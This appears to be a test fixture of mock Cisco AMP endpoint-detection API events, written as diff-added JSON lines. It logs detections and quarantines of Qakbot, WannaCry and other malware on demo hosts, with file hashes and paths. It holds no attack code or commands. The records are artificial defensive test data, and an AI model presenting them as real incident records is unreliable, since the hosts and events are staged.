+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 